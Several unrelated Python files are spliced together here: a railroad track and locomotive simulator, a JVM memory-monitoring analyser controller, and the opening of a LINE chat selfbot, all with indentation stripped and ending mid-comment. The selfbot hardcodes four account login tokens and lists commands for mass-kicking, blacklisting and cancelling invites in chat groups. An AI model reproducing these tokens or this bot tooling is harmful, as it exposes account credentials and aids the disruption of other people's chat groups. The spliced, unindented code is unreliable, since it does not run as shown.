'room_code': room_code,
}
SocketMsgHandler.send(self.conn, finish_game_req, self.server_config)
def send_game_room_list_req(self):
game_room_list_req = {'msg_name': 'GameRoomListReq'}
SocketMsgHandler.send(self.conn, game_room_list_req, self.server_config)
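# Illustrative usage sketch (not part of the original module). It assumes a JSON
# config file path is passed as the first CLI argument (see _load_config_file) and
# that the server in that config is reachable; the user name is hypothetical.
#
#   handler = ConnectionHandler()
#   handler.chat_message_signal.connect(lambda msg: print(msg['author'], msg['message']))
#   handler.send_create_room_req('alice')
#   handler.send_socket_disconnect_req()
#   handler.kill_receiver()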
if __name__ == '__main__':
pass
|
lib_track.py
|
""" PTC-Sim's collection of railroad component classes, including the track,
locomotives, base stations, etc., and the Track Simulator
Author: Dustin Fast, 2018
"""
import Queue
import multiprocessing
from time import sleep
from json import loads
from threading import Thread
from datetime import datetime
from ConfigParser import RawConfigParser
from math import degrees, radians, sin, cos, atan2
from lib_app import track_log
from lib_app import REFRESH_TIME
from lib_messaging import Connection, get_6000_msg
from lib_messaging import MSG_INTERVAL, LOCO_EMP_PREFIX
# Import conf data
config = RawConfigParser()
config.read('app_config.dat')
TRACK_RAILS = config.get('track', 'track_rails')
TRACK_LOCOS = config.get('track', 'track_locos')
TRACK_BASES = config.get('track', 'track_bases')
SPEED_UNITS = config.get('track', 'speed_units')
CONN_TIMEOUT = int(config.get('track', 'component_timeout'))
############################
# Top-Level/Parent Classes #
############################
class DeviceSim(object):
""" A collection of threads representing a device simulation. Exposes start
and stop interfaces.
Assumes each thread implements self.running (a bool) as a poison pill.
"""
def __init__(self, device, targets=[]):
self.running = False # Thread kill signal
self._thread_targets = targets
self._threads = []
self.device = device
self.label = device.name
self.time_iplier = 1 # (float) Time speed up/slow down
def start(self):
""" Starts the simulation threads.
"""
if not self.running:
self.running = True
self._threads = [Thread(target=t, args=[self.device])
for t in self._thread_targets]
[t.start() for t in self._threads]
def stop(self):
""" Stops the simulation threads.
"""
if self.running:
print('* Stopped sim thread ' + self.label)
self.running = False # Thread poison pill
[t.join(timeout=REFRESH_TIME) for t in self._threads]
class TrackDevice(object):
""" The template class for on-track, communication-enabled devices. I.e.,
Locos, Bases, and Waysides. Each device contains a type-specific,
real-time activity and communications simulation for testing and
demonstration purposes.
"""
def __init__(self, ID, device_type, location=None):
""" self.ID : (str) The Device's unique identifier
self.coords : (Location) The devices location, as a Location
self.conns : (dict) Connection objects - { ID: Connection }
self.sim : The device's simulation. Start w/self.sim.start()
"""
self.ID = ID
self.devtype = device_type
self.name = device_type + ' ' + self.ID
self.coords = location
self.conns = {}
self.sim = None
def __str__(self):
""" Returns a string representation of the device """
return self.name
def add_connection(self, connection):
""" Adds the given Connection instance to the devices's connections.
"""
self.conns[connection.ID] = connection
def connected(self):
""" Returns True iff at least one of the device's connections is active.
"""
if [c for c in self.conns.values() if c.connected()]:
return True
def disconnect(self):
""" Sets all the devices connections to an unconnected status.
"""
[c.disconnect() for c in self.conns.values()]
#################
# Child Classes #
#################
class Loco(TrackDevice):
""" An abstration of a locomotive. Includes a realtime simulation of its
activity/communications.
"""
def __init__(self, ID, track):
""" self.ID : (str) The Locomotives's unique identifier
self.track : (Track) Track object ref
self.speed : (float) Current speed
self.heading : (float) Current compass bearing
self.direction : (str) Either 'increasing' or 'decreasing'
self.coords : (Location) Current location, as a Location
self.bpp : (float) Brake pipe pressure. Affects braking.
self.bases_inrange: (list) Base objects within communication range
"""
TrackDevice.__init__(self, str(ID), 'Loco')
self.emp_addr = LOCO_EMP_PREFIX + self.ID
self.track = track
self.speed = None
self.heading = None
self.direction = None
self.coords = None
self.bpp = None
self.bases_inrange = []
self.bases = []
self.conns = {'Radio 1': Connection('Radio 1', timeout=CONN_TIMEOUT),
'Radio 2': Connection('Radio 2', timeout=CONN_TIMEOUT)}
self.sim = DeviceSim(self,
[TrackSim.loco_movement,
TrackSim.loco_messaging])
def update(self,
speed=None,
heading=None,
direction=None,
location=None,
bpp=None,
bases=None):
""" speed: A float, locos current speed.
heading: A float, locos current compass bearing.
direction: Either 'increasing', or 'decreasing'.
location: A Location denoting Locos current location.
bpp: A float, denoting current brake pipe pressure.
bases: A dict denoting current base connections. Is of the
format: { ConnectionLabel: base_ID }
"""
if speed is not None:
self.speed = speed
if heading is not None:
self.heading = heading
if direction is not None:
self.direction = direction
if location is not None:
self.coords = location
if bpp is not None:
self.bpp = bpp
if bases is not None:
if not bases:
[c.disconnect() for c in self.conns.values()]
return
try:
for conn_label, base_id in bases.iteritems():
self.conns[conn_label].connect(self.track.bases[base_id])
except KeyError:
err_str = ' - Invalid connection or base ID in bases param.'
raise ValueError(self.name + err_str)
class Base(TrackDevice):
""" An abstraction of a 220 MHz base station, including it's coverage area.
Includes a realtime simulation of its activity/communications.
"""
def __init__(self, ID, coverage_start, coverage_end, location):
""" self.ID = (String) The base station's unique identifier
self.cov_start = (float) Coverage start location
self.cov_end = (float) Coverage end location
self.coords = (Location) Location of this base station
"""
TrackDevice.__init__(self, ID, 'Base')
self.cov_start = coverage_start
self.cov_end = coverage_end
self.coords = location
def covers_location(self, location):
""" Given a location, returns True if this base provides
coverage at that location, else returns False.
"""
return self.cov_start <= location.marker <= self.cov_end
class Wayside(TrackDevice):
""" An abstraction of a wayside. Includes a realtime simulation of its
activity/communications.
"""
def __init__(self, ID, location, children={}):
""" self.ID : (str) The waysides unique ID/address
self.coords: (Location) The waysides location as a Location
self.children: (dict) Child devices { CHILD_ID: CHILD_OBJECT }
"""
raise NotImplementedError
# TrackDevice.__init__(self, ID, 'Wayside')
# self.children = {}
def add_child(self, child_object):
""" Given a child object (i.e. a switch), adds it to the wayside as a
device.
"""
raise NotImplementedError
# self.children[child_object.ID] = child_object
class TrackSwitch(TrackDevice):
""" An abstraction of an on-track directional switch.
Includes a realtime simulation of its activity/communications.
"""
def __init__(self, ID, location):
"""
"""
raise NotImplementedError
# TrackDevice.__init__(self, ID, 'Switch')
# self.status = None
def get_position(self):
""" Returns a string represenation of the devices status.
"""
raise NotImplementedError
##############################
# Terminal Top-level Classes #
##############################
class Track(object):
""" A representation of the track, including its locations and radio base
stations (contains lists/dicts of these objects in convenient forms).
self.locos = A dict of locomotives, by loco ID
Format: { LOCOID: LOCO_OBJECT }
self.bases = A dict of radio base stations, by base ID
Format: { BASEID: BASE_OBJECT }
self.mileposts = A dict of all track mileposts, by marker number
Format: { MP: LOCATIONOBJECT }
self.mileposts_sorted = A list of all track mileposts, sorted by marker
Format: [ LOCATIONOBJECT_1, ... , LOCATIONOBJECT_N ]
self.marker_linear = Numerical milepost markers in ascending order
Format: [ MP_1, ... , MP_n ], where MP1 < MPn
self.marker_linear_rev = Numerical milepost markers in descending order
Format: [ MP_n, ... , MP_1], where MP1 < MPn
Note: BASEID/LOCOID = strings, MP = floats
"""
def __init__(self,
track_file=TRACK_RAILS,
locos_file=TRACK_LOCOS,
bases_file=TRACK_BASES):
""" track_file: Track JSON representation
locos_file: Locos JSON representation
bases_file: Base stations JSON representation
"""
# On-Track device properties
self.locos = {}
self.bases = {}
self.last_seen = {} # Last msg recv time, by device:
# { DeviceType: { ID: DateTime } }
# Track properties
self.mileposts = {}
self.mileposts_sorted = []
self.marker_linear = []
self.marker_linear_rev = []
# self.restrictions = {} # { AUTH_ID: ( START_MILEPOST, END_MILEPOST }
# Populate base stations (self.bases) from bases_file
try:
with open(bases_file) as base_data:
bases = loads(base_data.read())
except Exception as e:
raise Exception('Error reading ' + bases_file + ': ' + str(e))
for base in bases:
try:
base_id = str(base['id'])
coverage_start = float(base['coverage'][0])
coverage_end = float(base['coverage'][1])
mp = base_id # base ids denote location
lat = float(base['lat'])
lng = float(base['long'])
except ValueError:
raise ValueError('Conversion error in ' + bases_file + '.')
except KeyError:
raise Exception('Malformed ' + bases_file + ': Key Error.')
self.bases[base_id] = Base(base_id,
coverage_start,
coverage_end,
Location(mp, lat, lng))
# Populate milepost objects (self.mileposts) from track_file
try:
with open(track_file) as rail_data:
locations = loads(rail_data.read())
except Exception as e:
raise Exception('Error reading ' + track_file + ': ' + str(e))
for marker in locations:
try:
mp = float(marker['milemarker'])
lat = float(marker['lat'])
lng = float(marker['long'])
except ValueError:
raise ValueError('Conversion error in ' + track_file + '.')
except KeyError:
raise Exception('Malformed ' + track_file + ': Key Error.')
self.mileposts[mp] = Location(mp, lat, lng)
coverage = [b for b in self.bases.values()
if b.covers_location(self.mileposts[mp])]
self.mileposts[mp].covered_by = coverage
# Build the other milepost lists/dicts from self.mileposts
self.marker_linear = [m for m in sorted(self.mileposts.keys())]
self.marker_linear_rev = self.marker_linear[::-1]
sorted_objs = [m for m in
sorted(self.mileposts.values(), key=lambda x: x.marker)]
self.mileposts_sorted = sorted_objs
# Populate Locomotive objects (self.locos) from locos_file
try:
with open(locos_file) as loco_data:
locos = loads(loco_data.read())
except Exception as e:
raise Exception('Error reading ' + locos_file + ': ' + str(e))
for loco in locos:
try:
mp = loco['lastmilepost']
try:
loco_location = self.mileposts[mp]
except KeyError:
raise Exception('Invalid milepost encountered: ' + str(mp))
loco_id = str(loco['id']) # Ensure string ID
loco_obj = Loco(loco_id, self)
loco_obj.update(speed=loco['lastspeed'],
heading=loco['lastheading'],
direction=loco['lastdirection'],
location=loco_location,
bpp=loco['lastbpp'])
self.locos[loco_id] = loco_obj
except KeyError:
raise Exception('Malformed ' + locos_file + ': Key Error.')
def _get_next_mp(self, curr_mp, distance):
""" Given a curr_mp and distance, returns the nearest mp marker at
curr_mp + distance. Also returns any difference not accounted
for.
Accepts:
curr_mp = Curr location (a Location)
distance = Distance in miles (neg dist denotes decreasing DOT)
Returns:
next_mp = nearest mp for curr_mp + distance without going over
dist_diff = difference between next_mp and actual location
Note: If next_mp = curr_mp, diff = distance.
If no next mp (end of track), returns None.
"""
# If no distance, next_mp is curr_mp
if distance == 0:
return curr_mp, distance
# Working vars
mp = curr_mp.marker
target_mp = mp + distance
dist_diff = 0
next_mp = None
# Set the location object list to iterate, depending on direction
if distance > 0:
mps = self.marker_linear
elif distance < 0:
mps = self.marker_linear_rev
# Find next mp marker, noting any unconsumed distance for next time
for i, marker in enumerate(mps):
if marker == target_mp:
next_mp = marker
dist_diff = 0
break
elif (distance > 0 and marker > target_mp) or \
(distance < 0 and marker < target_mp):
next_mp = mp
if i > 0:
next_mp = mps[i - 1]
dist_diff = abs(target_mp - next_mp)
break
# Get mp object associated with next_mp
next_mp_obj = self.get_location_at(next_mp)
# debug
# if not next_mp_obj:
# debug_str = '_get_next_mp failed to find a next location from: '
# debug_str += str(mps) + '\n'
# debug_str += 'cur_mp: ' + str(mp) + '\n'
# debug_str += 'moved : ' + str(distance) + '\n'
# debug_str += 'tgt_mp: ' + str(target_mp) + '\n'
# debug_str += 'mp_idx: ' + str(i) + '\n'
# debug_str += 'nxt_mp: ' + str(next_mp) + '\n'
# debug_str += 'disdif: ' + str(dist_diff) + '\n'
# raise Exception(debug_str)
return next_mp_obj, dist_diff
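# Worked example (illustrative; assumes mileposts at 1.0, 1.5 and 2.0):
#   _get_next_mp(<Location 1.0>, 0.7) -> (<Location 1.5>, 0.2)
# i.e. 0.5 miles are consumed reaching milepost 1.5 and the remaining 0.2 miles
# are returned as dist_diff, to be made up on the next movement iteration.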
def get_location_at(self, mile):
""" Returns the Location at the given track mile (a float) iff exists.
"""
return self.mileposts.get(mile, None)
def set_lastseen(self, device):
""" Given a TrackDevice, updates the Track.last_seen with the current
datetime for that device.
"""
if not self.last_seen.get(device.devtype):
self.last_seen[device.devtype] = {}
self.last_seen[device.devtype][device.ID] = datetime.now()
def get_lastseen(self, device):
""" Returns last comms time (datetime) for the given device iff exists.
"""
try:
return self.last_seen[device.devtype][device.ID]
except KeyError:
    return None
class Location:
""" An abstraction of a location.
"""
def __init__(self, marker, latitude, longitude, covered_by=None):
""" self.marker = (float) The numeric location marker
self.lat = (float) Latitude of location
self.long = (float) Longitude of location
self.covered_by = (list) Bases covering this location
"""
self.marker = marker
self.lat = latitude
self.long = longitude
self.covered_by = covered_by if covered_by is not None else []
def __str__(self):
""" Returns a string representation of the location.
"""
coord_str = str(self.marker)
coord_str += ' (' + str(self.lat) + ',' + str(self.long) + ')'
return coord_str
##############
# Track Sim #
##############
class TrackSim(multiprocessing.Process):
""" The Track Simulator. Simulates a locomotives traveling on the track and
sending/receiving EMP msgs over on-track communications infrastructure,
which is also simulated here.
"""
def __init__(self):
multiprocessing.Process.__init__(self)
self.timeq = multiprocessing.Queue() # Input queue for "time speed"
def run(self):
track_log.info('Track Sim Starting...')
track = Track() # The track contains all its devices and locos.
# Start each track component-device's simulation thread
# These devices exists "on" the track and simulate their own
# operation.
# TODO: Bases, Waysides, etc
for l in track.locos.values():
l.sim.start()
# Update sim time multiplier if needed
while True:
try:
time_iplier = self.timeq.get(timeout=.1)
for l in track.locos.values():
l.sim.time_iplier = time_iplier
track_log.info('Time Multiplier Set: ' + str(time_iplier))
except Queue.Empty:
pass
# debug
# for l in track.locos.values():
# status_str = 'Loco ' + l.ID + ': '
# status_str += str(l.speed) + ' @ ' + str(l.coords.marker)
# status_str += ' (' + str(l.coords.long) + ',' + str(l.coords.lat) + ')'
# status_str += '. Bases in range: '
# status_str += ', '.join([b.ID for b in l.bases_inrange])
# status_str += ' Conns: '
# status_str += ', '.join([c.conn_to.ID for c in l.conns.values() if c.conn_to])
# track_log.info(status_str)
sleep(REFRESH_TIME)
@staticmethod
def loco_movement(loco):
""" Real-time simulation of a locomotive's on-track movement. Also
determines base stations in range of the loco's current position.
This function is intended to be run as a Thread.
"""
def _brake():
""" Apply the adaptive braking algorithm.
"""
raise NotImplementedError
def _set_heading(prev_mp, curr_mp):
""" Sets loco heading based on current and prev lat/long
"""
lat1 = radians(prev_mp.lat)
lat2 = radians(curr_mp.lat)
long_diff = radians(prev_mp.long - curr_mp.long)
a = cos(lat1) * sin(lat2)
b = (sin(lat1) * cos(lat2) * cos(long_diff))
x = sin(long_diff) * cos(lat2)
y = a - b
deg = degrees(atan2(x, y))
compass_bearing = (deg + 360) % 360
loco.heading = compass_bearing
# Start
makeup_dist = 0
if not loco.direction or not loco.coords or loco.speed is None:
raise ValueError('Cannot simulate an uninitialized Locomotive.')
while loco.sim.running:
sleep(MSG_INTERVAL) # Sleep for specified interval
# Move, if at speed
if loco.speed > 0:
# Determine dist traveled since last iteration, including
# makeup distance, if any.
hours = REFRESH_TIME / 3600.0 # Seconds to hours, for mph
hours = loco.sim.time_iplier * hours # Apply sim time rate
dist = loco.speed * hours * 1.0 # distance = speed * time
dist += makeup_dist
# Set sign of dist based on dir of travel
if loco.direction == 'decreasing':
dist *= -1
# Get next location and any makeup distance
new_mp, dist = loco.track._get_next_mp(loco.coords, dist)
# If no new_mp was returned, assume end of track
if not new_mp:
err_str = ' - At end of track. Reversing.'
track_log.info(loco.name + err_str)
makeup_dist = 0
if loco.direction == 'decreasing':
loco.direction = 'increasing'
else:
loco.direction = 'decreasing'
# Else update the loco accordingly
else:
_set_heading(loco.coords, new_mp)
loco.coords = new_mp
makeup_dist = dist
# Determine base stations in range of current position
loco.bases_inrange = [b for b in loco.track.bases.values()
if b.covers_location(loco.coords)]
@staticmethod
def loco_messaging(loco):
""" Real-time simulation of a locomotives's messaging system. Maintains
connections to bases in range of loco's position.
# TODO: send/fetch msgs over them.
This function is intended to be run as a Thread.
"""
while loco.sim.running:
sleep(MSG_INTERVAL) # Sleep for specified interval
# Drop all out of range base connections and keep alive existing
# in-range connections
lconns = loco.conns.values()
for conn in [c for c in lconns if c.connected() is True]:
if conn.conn_to not in loco.bases_inrange:
conn.disconnect()
else:
conn.keep_alive()
open_conns = [c for c in lconns if c.connected() is False]
used_bases = [c.conn_to for c in lconns if c.connected() is True]
for i, conn in enumerate(open_conns):
try:
if loco.bases_inrange[i] not in used_bases:
conn.connect(loco.bases_inrange[i])
except IndexError:
break # No (or no more) bases in range to consider
# Ensure at least one active connection
conns = [c for c in lconns if c.connected() is True]
if not conns:
err_str = ' skipping msg send/recv - No active comms.'
track_log.warn(loco.name + err_str)
continue # Try again next iteration
# Send status msg over active connections, breaking on first success.
status_msg = get_6000_msg(loco)
for conn in conns:
try:
conn.send(status_msg)
info_str = ' - Sent status msg over ' + conn.conn_to.name
track_log.info(loco.name + info_str)
except Exception as e:
track_log.warn(loco.name + ' send failed: ' + str(e))
# Fetch incoming cad msgs over active connections, breaking on success.
for conn in conns:
cad_msg = None
try:
cad_msg = conn.fetch(loco.emp_addr)
except Queue.Empty:
break # No msgs (or no more msgs) to receive.
except Exception as e:
track_log.warn(loco.name + ' fetch failed: ' + str(e))
continue # Try the next connection
# Process cad msg, if msg and if actually for this loco
if cad_msg and cad_msg.payload.get('ID') == loco.ID:
try:
# TODO: Update track restrictions/loco locations
track_log.info(loco.name + ' - CAD msg processed.')
except:
track_log.error(loco.name + ' - Received invalid CAD msg.')
break # Either way, the msg was fetched # TODO: ACK w/broker
else:
err_str = ' - active connections exist, but msg fetch/recv failed.'
track_log.error(loco.name + err_str)
@staticmethod
def base_messaging(self):
""" Real-time simulation of a base station's messaging system
"""
raise NotImplementedError
@staticmethod
def wayside_messaging(self):
""" Real-time simulation of a wayside's messaging system
"""
raise NotImplementedError
# debug:
# if __name__ == '__main__':
# sim = TrackSim()
# sim.start()
|
analyser_controller.py
|
# -*- coding: utf-8 -*-
'''
This module controls the fetcher and analyser. It also starts
a thread that monitors the memory usage in the analyser process.
'''
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import threading
import multiprocessing
import Queue
import logging
import types
import psutil
import time
import commands
from . import config_util, ipc
from .exception import SnapshotException
class AnalyserController(object):
'''Controller class that starts a fetcher process and
a memory monitor thread that periodically checks memory
usage of the analyser process'''
def __init__(self, pf_queue, router, config,
mem_mon_params, memory_params):
self.config = config
self.queue_triple = None
self.node = None
self.router = router
self.drop = False
self.pf_queue = pf_queue
self.fetcher = None
self.fetcher_stop_event = multiprocessing.Event()
self.snapshot_event = multiprocessing.Event()
self.analyser = None
self.query = None
self.mem_monitor = None
self.mem_mon_stop_event = threading.Event()
self.mem_mon_params = mem_mon_params
self.memory_params = memory_params
self.neo4j_params = config_util.safe_read_config(self.config,
"NEO4J_PARAMS")
def _handle_command(self, msg):
cmd = msg.cont
if cmd['cmd'] == 'status':
ret = {}
try:
ret['num_msgs'] = self.analyser.event_orderer.get_queue_size()
except AttributeError:
pass
try:
ret['inbound_rate'] = self.analyser.inbound.rate
ret['outbound_rate'] = self.analyser.outbound.rate
except AttributeError:
pass
return ret
elif cmd['cmd'] == "exec_qry_method":
return self.query(cmd)
def start_service(self):
'''Starts the fetcher process and memory monitor thread'''
self._start_fetcher()
self._start_mem_monitor()
def _start_fetcher(self):
'''Initialises fetcher process specific members and
starts the fetcher'''
self.queue_triple = self.router.add("ANALYSER",
queue_class=multiprocessing.Queue,
queue_triple=True)
self.fetcher_stop_event.clear()
self.snapshot_event.clear()
self.fetcher = multiprocessing.Process(name='fetcher',
target=self._run_fetcher)
self.fetcher.start()
if __debug__:
logging.debug("Started fetcher process with pid: %d",
self.fetcher.pid)
def _start_mem_monitor(self):
'''Initialises and starts the memory monitor thread'''
if not self.mem_mon_params['mon_status']:
logging.info("Memory monitor thread is not set to ON status. "
"Cannot start thread")
return
self.mem_mon_stop_event.clear()
self.mem_monitor = threading.Thread(name='mem_monitor',
target=self._run_mem_monitor)
self.mem_monitor.start()
if __debug__:
logging.debug("Started the memory monitor thread")
def _run_fetcher(self):
'''Runs the fetcher process loop'''
import jpype
from . import analysis
from . import query
self.node = ipc.Worker(ident="ANALYSER",
queue_triple=self.queue_triple,
handler=self._handle_command,
queue_class=multiprocessing.Queue)
self.node.run_forever()
neo4j_cfg = {}
neo4j_cfg['neo4j_cfg'] = self.neo4j_params
self.analyser = config_util.load_module(self.config, "Analyser",
analysis.Analyser,
neo4j_cfg)
def _query(self, msg):
if not jpype.isThreadAttachedToJVM():
jpype.attachThreadToJVM()
return query.ClientQueryControl.exec_method(
self.analyser.db_iface, msg)
self.query = types.MethodType(_query, self)
if __debug__:
logging.debug("Starting analyser....")
self.analyser.start()
self.pf_queue.register_event(self.snapshot_event, SnapshotException())
while True:
try:
if self.snapshot_event.is_set():
if __debug__:
logging.debug("Snapshot event set, "
"fetcher exiting loop")
break
msg = self.pf_queue.dequeue()
self.analyser.put_msg(msg)
except Queue.Empty:
if(self.fetcher_stop_event.is_set() and
self.pf_queue.get_queue_size() == 0):
break
except SnapshotException:
logging.error("Snapshot event set!!")
self.analyser.snapshot_shutdown()
break
if __debug__:
logging.debug("Shutting down analyser....")
if self.analyser.do_shutdown(self.drop):
if __debug__:
logging.debug("Analyser has successfully shutdown")
else:
if __debug__:
logging.debug("Failed to shutdown analyser")
def _check_mem_condition(self, fetch_proc):
'''Checks JVM heap memory size and available memory on the system'''
proc_mem_info = fetch_proc.memory_info()
if __debug__:
logging.debug("RSS: %d", proc_mem_info.rss)
# If the JVM's current heap size is greater than 90%
# of the maximum value of heap size, restart analyser
(status, output) = commands.getstatusoutput(
'jstat -gccapacity %d' % (fetch_proc.pid))
if status != 0:
logging.error("%d: %s", status, output)
else:
lines = output.split('\n')
fields = lines[1].split()
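# Note (added for clarity; assumes the standard `jstat -gccapacity` column layout):
# fields[1] (NGCMX) + fields[7] (OGCMX) approximate the maximum heap size, while
# fields[3] + fields[4] + fields[5] (S0C + S1C + EC) plus fields[9] (OC) approximate
# the currently committed young- and old-generation capacity, all in KB.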
jstat_max_jvm = float(fields[1]) + float(fields[7])
heap_size = float(fields[3]) + float(fields[4])
heap_size += float(fields[5]) + float(fields[9])
if __debug__:
logging.debug("JVM current heap size: %f MB, "
"Max heap size: %f MB",
(heap_size / 1024),
(jstat_max_jvm / 1024))
if(heap_size >=
(self.memory_params['jvm_usage_threshold'] * jstat_max_jvm)):
logging.error("Warning!! JVM heap size above threshold, "
"current_heap: %f MB, max_heap: %f MB",
(heap_size / 1024), (jstat_max_jvm / 1024))
return True
# If the resident set size has increased beyond the maximum
# RSS threshold, restart the analyser
if('max_rss_threshold' in self.memory_params and
self.memory_params['max_rss_threshold'] is not None):
rss_in_mb = proc_mem_info.rss / (1024 * 1024)
if rss_in_mb > self.memory_params['max_rss_threshold']:
logging.info("Warning!! RSS: %f MB exceeded beyond "
"maximum threshold: %f MB",
rss_in_mb,
self.memory_params['max_rss_threshold'])
return True
# If system available memory is less than 25% of total memory
# and the analyser's RSS is more than 35% of the total memory,
# then restart the analyser
sys_mem_info = psutil.virtual_memory()
avail_mem = sys_mem_info.available
total_mem = sys_mem_info.total
if((avail_mem < (self.memory_params['min_percent_avail_mem'] *
total_mem)) and
(proc_mem_info.rss > (self.memory_params['max_rss_percent_mem'] *
total_mem))):
logging.error("System is running low on memory!!")
logging.error("Total mem: %d, Available mem: %d, Analyser mem: %d",
total_mem, avail_mem, proc_mem_info.rss)
return True
return False
def _run_mem_monitor(self):
'''Monitor the memory usage of the fetcher process'''
fetch_proc = psutil.Process(self.fetcher.pid)
time.sleep(1)
while not self.mem_mon_stop_event.is_set():
if not fetch_proc.is_running():
logging.error("Error: Fetcher with pid: %d is not running",
self.fetcher.pid)
break
if self._check_mem_condition(fetch_proc):
if self.snapshot_shutdown():
self._start_fetcher()
fetch_proc = psutil.Process(self.fetcher.pid)
else:
logging.error("Failed to shutdown fetcher/analyser, "
"restart manually")
break
time.sleep(self.mem_mon_params['mon_interval'])
def snapshot_shutdown(self):
'''Tells the analyser take a snapshot of its state and shutdown'''
self.snapshot_event.set()
self.pf_queue.wakeup()
try:
self.fetcher.join()
except RuntimeError as exc:
logging.error("Failed to snapshot and shutdown fetcher.")
logging.error(exc)
return False
return True
def _stop_mem_monitor(self):
'''Stops the memory monitor thread'''
if not self.mem_mon_params['mon_status']:
return True
self.mem_mon_stop_event.set()
try:
if __debug__:
logging.debug("Waiting for the memory monitor to join")
self.mem_monitor.join(self.mem_mon_params['mon_interval'] * 2)
except RuntimeError as exc:
logging.error("Failed to shutdown memory monitor thread.")
logging.error(exc)
return False
return True
def do_shutdown(self, drop):
'''Initiates shutdown of analyser controller'''
self.drop = drop
self.fetcher_stop_event.set()
try:
self.fetcher.join()
except RuntimeError as exc:
logging.error("Failed to shutdown fetcher process sucessfully.")
logging.error(exc)
return False
return self._stop_mem_monitor()
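# A minimal standalone sketch (not part of the original controller) of the same
# jstat-based heap check used by _check_mem_condition above, kept outside the
# class so it can be tried by hand. It relies on the `commands` and `logging`
# modules this file already uses, assumes the usual HotSpot column order for
# `jstat -gccapacity <pid>`, and the `threshold` argument plays the role of
# memory_params['jvm_usage_threshold'].
def jvm_heap_above_threshold(pid, threshold):
    '''Return True if the JVM's current heap capacity exceeds threshold * max heap.'''
    (status, output) = commands.getstatusoutput('jstat -gccapacity %d' % pid)
    if status != 0:
        logging.error("%d: %s", status, output)
        return False
    fields = output.split('\n')[1].split()
    max_heap = float(fields[1]) + float(fields[7])          # NGCMX + OGCMX
    cur_heap = (float(fields[3]) + float(fields[4]) +       # S0C + S1C
                float(fields[5]) + float(fields[9]))        # EC + OC
    if __debug__:
        logging.debug("JVM current heap: %f MB, max heap: %f MB",
                      cur_heap / 1024, max_heap / 1024)
    return cur_heap >= threshold * max_heap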
|
abc.py
|
# -*- coding: utf-8 -*-
import FXR
from FXR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
import tempfile,shutil
import requests
from random import randint
#kk = FXR.LINE()
#kk.login(qr=True)
#kk.loginResult()
cl = FXR.LINE()
cl.login(token="EmJP3cTCBBbxHq0PFdBb.TOwfr+vlbbebmmu/8etFgW.Tzn0ZFqDvUXD/jWhM/c/CgsPuaiV1kssQybIx8ZbdPs=")
ki = FXR.LINE()
ki.login(token="EmgF0AVGiGl8QAfvrNhd.NxllMtv6lqmOeR+fBoKPdq.0M6yj8tTk8PF7xHSMVxBkNqUkFnNnFODTx3aeSDYd/A=")
kk = FXR.LINE()
kk.login(token="Emd0Ugxca7DreRgUPqfe.D2UjDHf7T6UbYDdb8RmhhG.jouUV0WbNd2IRveT3B1ziqb+qDqByX6NqeLp70lASoc=")
kc = FXR.LINE()
kc.login(token="EmrEJYG9GKIazvHUoTTd.5+WFW3AUqznDTUyXU1x0Fq.gG7iMVl9Lb3OFpZ2DoYovuzXfCKomEBRzLQn5ryOJrI=")
reload(sys)
print "login success"
sys.setdefaultencoding('utf-8')
helpMessage =""" 〘тєαм вσт є∂ιтє∂〙
☁̸҉̸.̸҉ =ȼ๏ʍʍąɲď β๏ţ ̸҉̸.̸҉̸☁
[@Key,@key,@help,@Help]
[@set group]
[@bot?]
[@Creator,@creator]
[@Me]
[@Gift]
[@All gift]
[@Cancel,@cancel]
[@Open url,@open url]
[@Close url,@close url]
[Ginfo]
[@Id Group]
[@My mid]
[@Mid all]
[Wkwkwk,Wkwk,Wk,wkwkwk,wkwk,wk]
[Hehehe,Hehe,He,hehehe,hehe,he]
[Galau]
[You]
[Hadeuh]
[Please]
[Haaa]
[Lol]
[Hmmm,Hmm,Hm,hmmm,hmm,hm]
[Welcome]
[@Joinn on,@joinn on]
[@Joinn off,@joinn off]
[@Cancl on,@cancl on]
[@Cancl off,@cancl off]
[@Gr on,@gr on]
[@Gr off,@gr off]
[@Contact On,@Contact on,@contact on]
[@Contact Off,@Contact off,@contact off]
[@set view]
[@group id]
[@cancelall]
[@cctv]
[@nongol]
[@all join,@semua masuk,@pus]
[@Bye all]
[Tagall,kiwkiw,Kiwkiw,tagall]
[@Pembersihan]
[Nk ]
[@Ban @]
[@Unban @]
[@Reset,@reset]
[Copy @]
[@Up,@up,@Up Chat,@Up chat,@up chat,@Upchat,@upchat]
[@bc ]
[@list group]
[ZSIsay hi,pagi,bobo ah"]
[@PING,@Ping,@ping]
[Respon,respon,Respon Dong,respon dong]
[Respon beb]
[@speed,@speedbot]
[@bl ]
[@ban]
[@unban]
[@banlist]
[@cek ban]
[@kill ban]
[Admin add @]
[@admin remove @]
[@list admin,@adminlist]
"""
Setgroup =""" Private Menu B̳O̳T̳ L̳I̳N̳E̳ E̳D̳I̳T̳E̳D̳
[Protect Group]
-- Gr on/off
[Mid Via Contact]
-- Contact on/off
[Cancel All Invited]
-- Cancl on/off
[No Joinned]
-- Joinn on/off
"""
#"u532647a27196dbe0b82b874e047da521"
KAC=[cl,ki,kk,kc]
DEF=[ki,kk,kc]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,]
admin=["u349dbde6509797ddc33adce5b85cd856","udf271394eea3e117351be4e30654140c","u97f705b63d3da6099072d4ccf6a299e2","u16bc85075e502b66e4b715069bc05cb1","ud0c9863689311b0da0c8566f4401281d","uc103c714511b0b65dc30315ec9c58f95"]
owner=["u349dbde6509797ddc33adce5b85cd856"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"Thanks for add",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"ZSI",
"cName2":"ZSI2",
"cName3":"ZSI3",
"cName4":"ZSI4",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"atjointicket":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
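# Minimal sketch (not part of the original bot): the settings dicts above live
# only in memory, so every restart loses them. Helpers like the ones below
# could persist `wait` to a JSON file using modules already imported here; the
# filename is an arbitrary choice for illustration.
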